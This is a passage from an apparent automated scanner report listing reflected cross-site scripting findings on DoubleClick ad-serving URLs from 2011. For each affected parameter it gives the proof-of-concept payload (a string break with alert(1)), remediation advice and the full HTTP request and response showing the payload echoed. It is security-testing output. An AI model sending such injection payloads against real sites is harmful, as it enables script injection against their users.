<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
click%3Bh%3Dv8/3b02/f/1a3/%2a/m%3B239256273%3B0-0%3B0%3B61534219%3B4307-300/250%3B41414511/41432298/1%3B%3B%7Eokv%3D%3Bpc%3DgdncID5TgIAAAA%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l64633"-alert(1)-"82f4d6621e2&ai=BULngQgrITcOnDJHZsAeGwKDBDdiymZsCyL6SpCWQpurvRAAQARgBIIKq8w44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_g
...[SNIP]...

2.19. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4492.134426.1009314592321/B4140786.136

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 118ea"-alert(1)-"9a2ca46d5eb was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4492.134426.1009314592321/B4140786.136;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B6_E_rgnITePPD9OHlAeDi5ihCL_w4IwC7-ek-RKXyI6WHAAQARgBII3w5QU4AGDJhoWJiKSEEKAB9YrU7gOyARF3d3cuY3Ntb25pdG9yLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-6743622525202572&adurl=118ea"-alert(1)-"9a2ca46d5eb HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7402
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:36:23 GMT
Expires: Mon, 09 May 2011 15:36:23 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
i4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-6743622525202572&adurl=118ea"-alert(1)-"9a2ca46d5ebhttp://www.progressive.com/insurance/discounts/display.aspx?&code=9903600331");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "nev
...[SNIP]...

2.20. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4492.134426.1009314592321/B4140786.136

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3576"-alert(1)-"0cedd303306 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4492.134426.1009314592321/B4140786.136;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B6_E_rgnITePPD9OHlAeDi5ihCL_w4IwC7-ek-RKXyI6WHAAQARgBII3w5QU4AGDJhoWJiKSEEKAB9YrU7gOyARF3d3cuY3Ntb25pdG9yLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQBa3576"-alert(1)-"0cedd303306&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-6743622525202572&adurl=;ord=177302960? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:35:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7464

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
vbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQBa3576"-alert(1)-"0cedd303306&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-6743622525202572&adurl=http%3a%2f%2fwww.progressive.com/insurance/cre/scoreboard-display.aspx%3F%26code%3D9903600269");
var fscUrl = url;
v
...[SNIP]...

2.21. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4492.134426.1009314592321/B4140786.136

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29706"-alert(1)-"604da592d10 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4492.134426.1009314592321/B4140786.136;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B6_E_rgnITePPD9OHlAeDi5ihCL_w4IwC7-ek-RKXyI6WHAAQARgBII3w5QU4AGDJhoWJiKSEEKAB9YrU7gOyARF3d3cuY3Ntb25pdG9yLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-674362252520257229706"-alert(1)-"604da592d10&adurl=;ord=177302960? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:36:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7556

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
CAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-674362252520257229706"-alert(1)-"604da592d10&adurl=http%3a%2f%2fwww.progressive.com/insurance/nyp/display.aspx%3F%26code%3D9903600230%26utm_medium%3Dbanner%26utm_campaign%3Dnyp");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode =
...[SNIP]...

2.22. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4492.134426.1009314592321/B4140786.136

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf6f4"-alert(1)-"a73c9128e07 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4492.134426.1009314592321/B4140786.136;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B6_E_rgnITePPD9OHlAeDi5ihCL_w4IwC7-ek-RKXyI6WHAAQARgBII3w5QU4AGDJhoWJiKSEEKAB9YrU7gOyARF3d3cuY3Ntb25pdG9yLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1cf6f4"-alert(1)-"a73c9128e07&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-6743622525202572&adurl=;ord=177302960? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:36:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7556

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
TcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1cf6f4"-alert(1)-"a73c9128e07&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-6743622525202572&adurl=http%3a%2f%2fwww.progressive.com/insurance/nyp/display.aspx%3F%26code%3D9903600230%26utm_medium%3Dbanner%26utm_campaign%3Dny
...[SNIP]...

2.23. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4492.134426.1009314592321/B4140786.136

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30950"-alert(1)-"246a968b642 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4492.134426.1009314592321/B4140786.136;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B6_E_rgnITePPD9OHlAeDi5ihCL_w4IwC7-ek-RKXyI6WHAAQARgBII3w5QU4AGDJhoWJiKSEEKAB9YrU7gOyARF3d3cuY3Ntb25pdG9yLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw30950"-alert(1)-"246a968b642&client=ca-pub-6743622525202572&adurl=;ord=177302960? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:36:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7464

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
b25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw30950"-alert(1)-"246a968b642&client=ca-pub-6743622525202572&adurl=http%3a%2f%2fwww.progressive.com/insurance/cre/scoreboard-display.aspx%3F%26code%3D9903600269");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode =
...[SNIP]...

2.24. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4492.134426.1009314592321/B4140786.136

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e982c"-alert(1)-"f7eecd04480 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4492.134426.1009314592321/B4140786.136;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=le982c"-alert(1)-"f7eecd04480&ai=B6_E_rgnITePPD9OHlAeDi5ihCL_w4IwC7-ek-RKXyI6WHAAQARgBII3w5QU4AGDJhoWJiKSEEKAB9YrU7gOyARF3d3cuY3Ntb25pdG9yLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-6743622525202572&adurl=;ord=177302960? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:35:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7441

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/f/1d2/%2a/r%3B236519140%3B5-0%3B0%3B44340201%3B3454-728/90%3B40726720/40744507/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=le982c"-alert(1)-"f7eecd04480&ai=B6_E_rgnITePPD9OHlAeDi5ihCL_w4IwC7-ek-RKXyI6WHAAQARgBII3w5QU4AGDJhoWJiKSEEKAB9YrU7gOyARF3d3cuY3Ntb25pdG9yLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjA
...[SNIP]...

2.25. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5895.133090.0460774079521/B4563625.8

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2115e"-alert(1)-"a9e584a7d9f was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=1005002115e"-alert(1)-"a9e584a7d9f&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:37:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5946

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
k%3Bh%3Dv8/3b02/7/aa/%2a/m%3B240603520%3B0-0%3B0%3B63480535%3B3454-728/90%3B41067063/41084850/2%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=1005002115e"-alert(1)-"a9e584a7d9f&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://www.restaurantfavorites.com/");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscrip
...[SNIP]...

2.26. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5895.133090.0460774079521/B4563625.8

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ebc9"-alert(1)-"fe7d4fbae1a was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=1156117ebc9"-alert(1)-"fe7d4fbae1a&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:37:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5946

